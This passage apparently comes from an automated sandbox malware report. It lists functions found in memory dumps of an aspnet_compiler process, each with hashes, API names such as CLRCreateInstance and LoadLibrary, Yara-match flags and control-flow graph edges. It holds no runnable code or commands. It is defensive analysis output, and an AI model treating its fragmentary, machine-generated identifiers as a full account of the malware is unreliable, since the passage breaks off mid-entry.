                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9c93103c6b8ecd11b08abb79d5656497f67f9590088ea0131c60f6c59f5d35f6
                                                                • Instruction ID: 1a5061f0c5d0c7d4ce98a779bd1984b636110bbe36ee7691ece42a31fa767ccd
                                                                • Opcode Fuzzy Hash: 9c93103c6b8ecd11b08abb79d5656497f67f9590088ea0131c60f6c59f5d35f6
                                                                • Instruction Fuzzy Hash: 17A11970E1960E8FEB98EF58C864BEDB7A1FF58310F1041A9D41DE32E6CA385985CB41
                                                                Function 00007FFD9B967419 Relevance: .1, Instructions: 97COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 71a420874a4388097c1e8eb80520cf5d706fc84cb40af5591b68f2f9f58cbf06
                                                                • Instruction ID: 49c6050276e9ec0bda3d6ae506d184d8cc52bba1a22f741a0534aa60c4d3d5c9
                                                                • Opcode Fuzzy Hash: 71a420874a4388097c1e8eb80520cf5d706fc84cb40af5591b68f2f9f58cbf06
                                                                • Instruction Fuzzy Hash: 48314930E1A51D9FDB64DFA8D864AFCB7B2EF55314F5050B9D00DA32A1CA38AA81CB04
                                                                Function 00007FFD9B96A151 Relevance: .0, Instructions: 43COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 21ecbb319607a496ab3fe418106410369f07266474f80344202eae5e1cbe2691
                                                                • Instruction ID: 1e9ed08fc9f13814dab9994fb3f70d1d93d6f845c1834b60ec073c37cc08c7ae
                                                                • Opcode Fuzzy Hash: 21ecbb319607a496ab3fe418106410369f07266474f80344202eae5e1cbe2691
                                                                • Instruction Fuzzy Hash: 47015630E1521E8EEB20DF95C4507FDB3B1EF86311F008139C128A71E9CA395689CF80
                                                                Function 000001904EEE2566 Relevance: 4.7, APIs: 3, Instructions: 226memoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2959415202.000001904EEC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001904EEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_1904eec0000_aspnet_compiler.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocArrayCreateDestroyInstanceSafeString
                                                                • String ID:
                                                                • API String ID: 815377780-0
                                                                • Opcode ID: 1e378af6d27dfc507e22e8ba87a9d8664e9aae4a206c1945e061b62da3beb022
                                                                • Instruction ID: 4ae814a7884b527d123eff961fa505a380a7e3e99d34a18d4aebc154144f6c76
                                                                • Opcode Fuzzy Hash: 1e378af6d27dfc507e22e8ba87a9d8664e9aae4a206c1945e061b62da3beb022
                                                                • Instruction Fuzzy Hash: 30716B30218A09CFDB69EF39D899BA6B7E0FF99301F104669959BC7151DB30F905CB82
                                                                Function 000001904EEE3FB4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104libraryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2959415202.000001904EEC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001904EEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_1904eec0000_aspnet_compiler.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LibraryLoad
                                                                • String ID: l
                                                                • API String ID: 1029625771-2517025534
                                                                • Opcode ID: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
                                                                • Instruction ID: 6fa10ca796e8dc77b4f07fab4e5e9a61b5ec9a2be382e2b7c6ef927dc04ed97f
                                                                • Opcode Fuzzy Hash: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
                                                                • Instruction Fuzzy Hash: AA31A33051CA858FE75AEB2DC054B62BBD4FBA9308F2456BDC1CAC7296D720DC068742
                                                                Function 000001904EEE2528 Relevance: 1.6, APIs: 1, Instructions: 129memoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 157 1904eee2528-1904eee255f 158 1904eee25ff-1904eee2606 157->158 159 1904eee2565 157->159 160 1904eee2608-1904eee2621 158->160 161 1904eee2629-1904eee262b 158->161 162 1904eee2566-1904eee2578 CLRCreateInstance 159->162 160->161 165 1904eee263d-1904eee2642 161->165 166 1904eee262d-1904eee2633 161->166 163 1904eee257e-1904eee2597 162->163 164 1904eee2638-1904eee263b 162->164 168 1904eee259c-1904eee25b3 163->168 164->160 169 1904eee2647-1904eee2649 165->169 167 1904eee277d-1904eee2798 166->167 172 1904eee25b8-1904eee25ba 168->172 170 1904eee264f-1904eee265d 169->170 171 1904eee277a-1904eee277b 169->171 173 1904eee265f-1904eee266f 170->173 174 1904eee2671-1904eee2686 170->174 171->167 175 1904eee25bc-1904eee25cf 172->175 176 1904eee25f8-1904eee25f9 172->176 181 1904eee26b9-1904eee26bc 173->181 177 1904eee268b-1904eee26a9 SysAllocString 174->177 175->160 184 1904eee25d1-1904eee25d9 175->184 178 1904eee25fb-1904eee25fd 176->178 182 1904eee26ad-1904eee26b1 177->182 178->158 178->160 181->171 183 1904eee26c2-1904eee26d7 181->183 182->181 183->171 187 1904eee26dd-1904eee270e 183->187 184->178 185 1904eee25db-1904eee25f1 184->185 188 1904eee25f6 185->188 187->171 190 1904eee2710-1904eee271c 187->190 188->178 191 1904eee271e-1904eee2731 190->191 192 1904eee2733-1904eee273f 190->192 191->191 191->192 193 1904eee2747-1904eee2759 192->193 194 1904eee275b-1904eee276f 193->194 195 1904eee2771-1904eee2774 SafeArrayDestroy 193->195 194->194 194->195 195->171
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2959415202.000001904EEC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001904EEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_1904eec0000_aspnet_compiler.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocArrayCreateDestroyInstanceSafeString
                                                                • String ID:
                                                                • API String ID: 815377780-0
                                                                • Opcode ID: d8270353524c7209e62da373cde049d979e5b9a2e03ad85e1312cb18040becdc
                                                                • Instruction ID: 65ef5aea35417a05071931abc977fcb733043f3d29eae350be93ba8efedfdcc0
                                                                • Opcode Fuzzy Hash: d8270353524c7209e62da373cde049d979e5b9a2e03ad85e1312cb18040becdc
                                                                • Instruction Fuzzy Hash: F441813121CE098FD758EF29D895AE6B3E4FB99314F00462ED58BC7051EB31E9058BC2
                                                                Function 00007FFD9B9662D3 Relevance: .7, Instructions: 718COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ec18ac12f7fcd2bb63787134b9b4b1de71669aa9259344ea5ababde75dbcddeb
                                                                • Instruction ID: d905e2c8469ba1d01166f087a97e070e398e29144e2cc4e1652caad9ffcbc4c2
                                                                • Opcode Fuzzy Hash: ec18ac12f7fcd2bb63787134b9b4b1de71669aa9259344ea5ababde75dbcddeb
                                                                • Instruction Fuzzy Hash: B0913B36B1D259DEE725ABACF825AEC77A0EF41328F044177D05DCB0E7DE28254A8790
                                                                Function 00007FFD9B963952 Relevance: .3, Instructions: 303COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 296 7ffd9b963952-7ffd9b963959 297 7ffd9b96395c-7ffd9b963988 296->297 298 7ffd9b96395b 296->298 299 7ffd9b96398a-7ffd9b9639bf 297->299 300 7ffd9b963925-7ffd9b96394c 297->300 298->297 303 7ffd9b9639c1 299->303 304 7ffd9b9639c6-7ffd9b963a22 299->304 303->304 307 7ffd9b963a24-7ffd9b963a42 304->307 308 7ffd9b963a6c-7ffd9b963ab7 304->308 307->308 311 7ffd9b963abe-7ffd9b963b13 308->311 312 7ffd9b963ab9 308->312 313 7ffd9b963b1e-7ffd9b963b30 311->313 312->311 314 7ffd9b963b32 313->314 315 7ffd9b963b37-7ffd9b963b41 313->315 314->315 316 7ffd9b963b43-7ffd9b963b44 315->316 317 7ffd9b963b46-7ffd9b963b50 315->317 320 7ffd9b963b76-7ffd9b963be0 316->320 318 7ffd9b963b52 317->318 319 7ffd9b963b57-7ffd9b963b73 317->319 318->319 319->320 325 7ffd9b963c3e-7ffd9b963c67 320->325 327 7ffd9b963be2-7ffd9b963c3d 325->327 328 7ffd9b963c6d-7ffd9b963c8e call 7ffd9b963c8f 325->328 327->325
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: da65fa37baaa2bb7e7f7d44cfeab1503e5e2b8a99b7218b7cd1cafd5ef774063
                                                                • Instruction ID: 4cb58700d685c073fb1de7b31a540537325a4d1841891567f83b6ae720e371fb
                                                                • Opcode Fuzzy Hash: da65fa37baaa2bb7e7f7d44cfeab1503e5e2b8a99b7218b7cd1cafd5ef774063
                                                                • Instruction Fuzzy Hash: E4B1BF70A0DA4D9FDB95DB68C865BA8BBF0FF59300F0141EED04DD72A2DA389981CB01
                                                                Function 00007FFD9B965228 Relevance: .3, Instructions: 252COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 438 7ffd9b965228-7ffd9b96522e 440 7ffd9b965241 438->440 441 7ffd9b965230 438->441 442 7ffd9b965243-7ffd9b965246 440->442 443 7ffd9b965235-7ffd9b965236 440->443 441->443 444 7ffd9b965256-7ffd9b9652e1 442->444 445 7ffd9b965248-7ffd9b96524e 442->445 443->445 446 7ffd9b965238-7ffd9b96523e 443->446 462 7ffd9b9652e3 444->462 463 7ffd9b9652e8-7ffd9b9654c9 call 7ffd9b9601d0 call 7ffd9b960740 call 7ffd9b960728 call 7ffd9b960738 call 7ffd9b960748 call 7ffd9b960128 call 7ffd9b960130 call 7ffd9b960558 call 7ffd9b960138 call 7ffd9b960140 call 7ffd9b960148 call 7ffd9b960150 call 7ffd9b960158 call 7ffd9b960730 call 7ffd9b960160 call 7ffd9b960170 call 7ffd9b960178 call 7ffd9b960180 call 7ffd9b965080 call 7ffd9b9650a0 call 7ffd9b9651e0 call 7ffd9b9651f0 call 7ffd9b9651e8 call 7ffd9b9651d8 call 7ffd9b965118 call 7ffd9b965128 call 7ffd9b965138 call 7ffd9b965140 call 7ffd9b965148 call 7ffd9b965150 call 7ffd9b965158 call 7ffd9b965160 call 7ffd9b965168 call 7ffd9b965170 call 7ffd9b965178 call 7ffd9b965180 call 7ffd9b965188 call 7ffd9b965190 call 7ffd9b965198 call 7ffd9b9651a0 call 7ffd9b9651a8 call 7ffd9b9651b0 call 7ffd9b9651b8 call 7ffd9b9651c0 call 7ffd9b9651c8 call 7ffd9b9651d0 call 7ffd9b965210 call 7ffd9b965228 call 7ffd9b965230 call 7ffd9b965238 call 7ffd9b965240 call 7ffd9b9650c8 call 7ffd9b965250 call 7ffd9b9650f0 call 7ffd9b965108 call 7ffd9b965130 call 7ffd9b965120 call 7ffd9b9650f8 call 7ffd9b9650e8 call 7ffd9b965260 call 7ffd9b965100 call 7ffd9b965110 call 7ffd9b9650e0 call 7ffd9b9650d0 call 7ffd9b9650d8 call 7ffd9b9651f8 call 7ffd9b965298 call 7ffd9b9630d0 call 7ffd9b9630a0 call 7ffd9b9630b0 call 7ffd9b9630b8 call 7ffd9b9630c0 call 7ffd9b9630c8 call 7ffd9b9630e0 call 7ffd9b9630a8 call 7ffd9b9630d8 call 7ffd9b960198 call 7ffd9b9601a0 444->463 452 7ffd9b96525d-7ffd9b965260 445->452 453 7ffd9b965250-7ffd9b965255 445->453 450 7ffd9b965240-7ffd9b965246 446->450 451 7ffd9b96524f-7ffd9b965255 446->451 450->444 451->444 453->444 462->463
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1f21af632e19d0a2b14eea829aefac6cf85c9dc5da92fade17735c6309acd02a
                                                                • Instruction ID: 10a07c2027abcb97acd8d99f8cfff45c7c44dfbe2ab63e200f2b31723619ea1c
                                                                • Opcode Fuzzy Hash: 1f21af632e19d0a2b14eea829aefac6cf85c9dc5da92fade17735c6309acd02a
                                                                • Instruction Fuzzy Hash: 8B615751EBF15FAEE23633A865FE5FA2740DF43714F87AD72E05D4A0E78C88A6094190
                                                                Function 00007FFD9B964DA2 Relevance: .2, Instructions: 250COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 621 7ffd9b964da2-7ffd9b964da9 622 7ffd9b964dac-7ffd9b964e1e 621->622 623 7ffd9b964dab 621->623 624 7ffd9b964e20 622->624 625 7ffd9b964e25-7ffd9b964e7e 622->625 623->622 624->625 630 7ffd9b964e7f-7ffd9b964e82 625->630 631 7ffd9b964e84 630->631 632 7ffd9b964eba-7ffd9b964f35 630->632 631->630 633 7ffd9b964e86-7ffd9b964eb9 631->633 641 7ffd9b964f3b-7ffd9b964f48 632->641 633->632 642 7ffd9b964f4d-7ffd9b964ffa 641->642
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: aaa30ff721751a6b86ff0cd3722c825996025900ea5ec5d64c6acc54958a7737
                                                                • Instruction ID: 53f676e91643ce2f93dc784ac9e4028bb83b5deb9ab0b04aa7e5162ac6bc651b
                                                                • Opcode Fuzzy Hash: aaa30ff721751a6b86ff0cd3722c825996025900ea5ec5d64c6acc54958a7737
                                                                • Instruction Fuzzy Hash: 7C91FB70A09A5C9FDB95EFA8C855BACBBF1FF59300F1441AAD00DD7262CB34A981CB41
                                                                Function 00007FFD9B965230 Relevance: .2, Instructions: 239COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 649 7ffd9b965230-7ffd9b965236 651 7ffd9b965248-7ffd9b96524e 649->651 652 7ffd9b965238-7ffd9b96523e 649->652 657 7ffd9b96525d-7ffd9b965260 651->657 658 7ffd9b965250-7ffd9b965255 651->658 655 7ffd9b965240-7ffd9b965246 652->655 656 7ffd9b96524f-7ffd9b965255 652->656 659 7ffd9b965256-7ffd9b9652e1 655->659 656->659 658->659 669 7ffd9b9652e3 659->669 670 7ffd9b9652e8-7ffd9b9654c9 call 7ffd9b9601d0 call 7ffd9b960740 call 7ffd9b960728 call 7ffd9b960738 call 7ffd9b960748 call 7ffd9b960128 call 7ffd9b960130 call 7ffd9b960558 call 7ffd9b960138 call 7ffd9b960140 call 7ffd9b960148 call 7ffd9b960150 call 7ffd9b960158 call 7ffd9b960730 call 7ffd9b960160 call 7ffd9b960170 call 7ffd9b960178 call 7ffd9b960180 call 7ffd9b965080 call 7ffd9b9650a0 call 7ffd9b9651e0 call 7ffd9b9651f0 call 7ffd9b9651e8 call 7ffd9b9651d8 call 7ffd9b965118 call 7ffd9b965128 call 7ffd9b965138 call 7ffd9b965140 call 7ffd9b965148 call 7ffd9b965150 call 7ffd9b965158 call 7ffd9b965160 call 7ffd9b965168 call 7ffd9b965170 call 7ffd9b965178 call 7ffd9b965180 call 7ffd9b965188 call 7ffd9b965190 call 7ffd9b965198 call 7ffd9b9651a0 call 7ffd9b9651a8 call 7ffd9b9651b0 call 7ffd9b9651b8 call 7ffd9b9651c0 call 7ffd9b9651c8 call 7ffd9b9651d0 call 7ffd9b965210 call 7ffd9b965228 call 7ffd9b965230 call 7ffd9b965238 call 7ffd9b965240 call 7ffd9b9650c8 call 7ffd9b965250 call 7ffd9b9650f0 call 7ffd9b965108 call 7ffd9b965130 call 7ffd9b965120 call 7ffd9b9650f8 call 7ffd9b9650e8 call 7ffd9b965260 call 7ffd9b965100 call 7ffd9b965110 call 7ffd9b9650e0 call 7ffd9b9650d0 call 7ffd9b9650d8 call 7ffd9b9651f8 call 7ffd9b965298 call 7ffd9b9630d0 call 7ffd9b9630a0 call 7ffd9b9630b0 call 7ffd9b9630b8 call 7ffd9b9630c0 call 7ffd9b9630c8 call 7ffd9b9630e0 call 7ffd9b9630a8 call 7ffd9b9630d8 call 7ffd9b960198 call 7ffd9b9601a0 659->670 669->670
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: da0063441cb722320ea86212cbd9635d2a4d4788fad593b460e2294f28ddc16e
                                                                • Instruction ID: 3494835d01004c49fd1c98f1bd4105d940f67237a3396d9db415fb0749254272
                                                                • Opcode Fuzzy Hash: da0063441cb722320ea86212cbd9635d2a4d4788fad593b460e2294f28ddc16e
                                                                • Instruction Fuzzy Hash: BC615611EBF15FAEE23633A825FE5FA2750DF43714F87AD72E05D4A0E78C88A2094190
                                                                Function 00007FFD9B961E72 Relevance: .2, Instructions: 236COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3c2ebf80ec704f8a5adee78df11a9203f2717844e974e1f600f9e14bb95a312e
                                                                • Instruction ID: de89ee0684557035980790a489acd7b2988e6b96f8739d177ab7ca5419b76b7c
                                                                • Opcode Fuzzy Hash: 3c2ebf80ec704f8a5adee78df11a9203f2717844e974e1f600f9e14bb95a312e
                                                                • Instruction Fuzzy Hash: 27816370A09A4DDFDF95DBA8C495A9CBBF1FF6A300F5511A9D049DB2A2DB349C81CB00
                                                                Function 00007FFD9B965250 Relevance: .2, Instructions: 233COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 856 7ffd9b965250-7ffd9b9652e1 865 7ffd9b9652e3 856->865 866 7ffd9b9652e8-7ffd9b9654c9 call 7ffd9b9601d0 call 7ffd9b960740 call 7ffd9b960728 call 7ffd9b960738 call 7ffd9b960748 call 7ffd9b960128 call 7ffd9b960130 call 7ffd9b960558 call 7ffd9b960138 call 7ffd9b960140 call 7ffd9b960148 call 7ffd9b960150 call 7ffd9b960158 call 7ffd9b960730 call 7ffd9b960160 call 7ffd9b960170 call 7ffd9b960178 call 7ffd9b960180 call 7ffd9b965080 call 7ffd9b9650a0 call 7ffd9b9651e0 call 7ffd9b9651f0 call 7ffd9b9651e8 call 7ffd9b9651d8 call 7ffd9b965118 call 7ffd9b965128 call 7ffd9b965138 call 7ffd9b965140 call 7ffd9b965148 call 7ffd9b965150 call 7ffd9b965158 call 7ffd9b965160 call 7ffd9b965168 call 7ffd9b965170 call 7ffd9b965178 call 7ffd9b965180 call 7ffd9b965188 call 7ffd9b965190 call 7ffd9b965198 call 7ffd9b9651a0 call 7ffd9b9651a8 call 7ffd9b9651b0 call 7ffd9b9651b8 call 7ffd9b9651c0 call 7ffd9b9651c8 call 7ffd9b9651d0 call 7ffd9b965210 call 7ffd9b965228 call 7ffd9b965230 call 7ffd9b965238 call 7ffd9b965240 call 7ffd9b9650c8 call 7ffd9b965250 call 7ffd9b9650f0 call 7ffd9b965108 call 7ffd9b965130 call 7ffd9b965120 call 7ffd9b9650f8 call 7ffd9b9650e8 call 7ffd9b965260 call 7ffd9b965100 call 7ffd9b965110 call 7ffd9b9650e0 call 7ffd9b9650d0 call 7ffd9b9650d8 call 7ffd9b9651f8 call 7ffd9b965298 call 7ffd9b9630d0 call 7ffd9b9630a0 call 7ffd9b9630b0 call 7ffd9b9630b8 call 7ffd9b9630c0 call 7ffd9b9630c8 call 7ffd9b9630e0 call 7ffd9b9630a8 call 7ffd9b9630d8 call 7ffd9b960198 call 7ffd9b9601a0 856->866 865->866
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 54cedc0356bf5f6aa25921f139dc8efc24d28b140f4ecbea455e3d358a7067ef
                                                                • Instruction ID: b2d4c3371cbc9ec6b227070050b1f1a00be3450903c0dcd92eac8182ab65063b
                                                                • Opcode Fuzzy Hash: 54cedc0356bf5f6aa25921f139dc8efc24d28b140f4ecbea455e3d358a7067ef
                                                                • Instruction Fuzzy Hash: 47513611EBF15FAEE27633A855FE5FA2750DF43714F87AD72E05D4A0E78C88A2094290
                                                                Function 00007FFD9B9631F5 Relevance: .2, Instructions: 229COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1024 7ffd9b9631f5-7ffd9b963202 1025 7ffd9b963204-7ffd9b963222 1024->1025 1026 7ffd9b96324c-7ffd9b963297 1024->1026 1025->1026 1029 7ffd9b96329e-7ffd9b9632f3 1026->1029 1030 7ffd9b963299 1026->1030 1031 7ffd9b9632fe-7ffd9b963310 1029->1031 1030->1029 1032 7ffd9b963312 1031->1032 1033 7ffd9b963317-7ffd9b963321 1031->1033 1032->1033 1034 7ffd9b963323-7ffd9b963324 1033->1034 1035 7ffd9b963326-7ffd9b963330 1033->1035 1036 7ffd9b963356-7ffd9b963366 1034->1036 1037 7ffd9b963332 1035->1037 1038 7ffd9b963337-7ffd9b963353 1035->1038 1039 7ffd9b9633b0-7ffd9b9633c0 1036->1039 1040 7ffd9b963368-7ffd9b9633ae 1036->1040 1037->1038 1038->1036 1041 7ffd9b96341e-7ffd9b963447 1039->1041 1040->1039 1045 7ffd9b9633c2-7ffd9b96341d 1041->1045 1046 7ffd9b96344d-7ffd9b96346e call 7ffd9b96346f 1041->1046 1045->1041
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5af5a37662b73c068d23c997b848ba5df277126d2f893fff81ae51305bad13d6
                                                                • Instruction ID: 260b92b68d5a1c416001d8f8b18da04caa1b2b8c9afa9b59e86a418f110514bb
                                                                • Opcode Fuzzy Hash: 5af5a37662b73c068d23c997b848ba5df277126d2f893fff81ae51305bad13d6
                                                                • Instruction Fuzzy Hash: CC813C70A1DA5C9FDB94EB68C465BACBBF1FF69300F5041AED04DD72A1CA35A985CB00
                                                                Function 00007FFD9B964A50 Relevance: .2, Instructions: 227COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 83e2ed9e25ae7b15a5c6f059d11a5b7b578c42deca2e15dbbcdb50811404cef7
                                                                • Instruction ID: 31e7b8a47b1640846dac04ae306a526665749bd616167b4b93f8d75dd42c6c43
                                                                • Opcode Fuzzy Hash: 83e2ed9e25ae7b15a5c6f059d11a5b7b578c42deca2e15dbbcdb50811404cef7
                                                                • Instruction Fuzzy Hash: E7811F70A19A5D9FDB94EBA8C465BACBBF1FF69300F5140AED00DD72A1DA345981CB01
                                                                Function 00007FFD9B960862 Relevance: .2, Instructions: 227COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b05705aa7a114d7d1bbd96256ff393fa4f115d42d82d938c6dac56778ea282b8
                                                                • Instruction ID: a5af5e0aab3d8c7379a2c87e2d59153268ad2b85a0f9714924a95743c1099989
                                                                • Opcode Fuzzy Hash: b05705aa7a114d7d1bbd96256ff393fa4f115d42d82d938c6dac56778ea282b8
                                                                • Instruction Fuzzy Hash: D071E871A5B689AFE746E7B884A55AD7FF0FF5721075544F9D088CB1ABED281C02C300
                                                                Function 00007FFD9B963605 Relevance: .2, Instructions: 224COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c7440320ffd24f7df83b265a27115d28859fa5ff800b5b858cac65fd25939976
                                                                • Instruction ID: e6c5ad8fcf6686db4bc88539594cfaa77b8face3e3e1a2d2625d8ef8d36674b5
                                                                • Opcode Fuzzy Hash: c7440320ffd24f7df83b265a27115d28859fa5ff800b5b858cac65fd25939976
                                                                • Instruction Fuzzy Hash: CD812DB0A1965D9FDB98EB68C465BACBBF1FF69300F1140EAD04DD72A1CA349981CB01
                                                                Function 00007FFD9B960598 Relevance: .2, Instructions: 224COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 844dfedd11e3e519624986889f5911a263b4e64ced127e0de0572b1a972cf901
                                                                • Instruction ID: 3b5eb8cf99027a5fc3abe982f2733d10a95085b222d1cee64288a914e73b5e59
                                                                • Opcode Fuzzy Hash: 844dfedd11e3e519624986889f5911a263b4e64ced127e0de0572b1a972cf901
                                                                • Instruction Fuzzy Hash: CF71C970A08A1C9FDF94EF98C899BACBBF1FF59301F1041A9D00DE7265DA34A981CB41
                                                                Function 00007FFD9B962A17 Relevance: .2, Instructions: 220COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
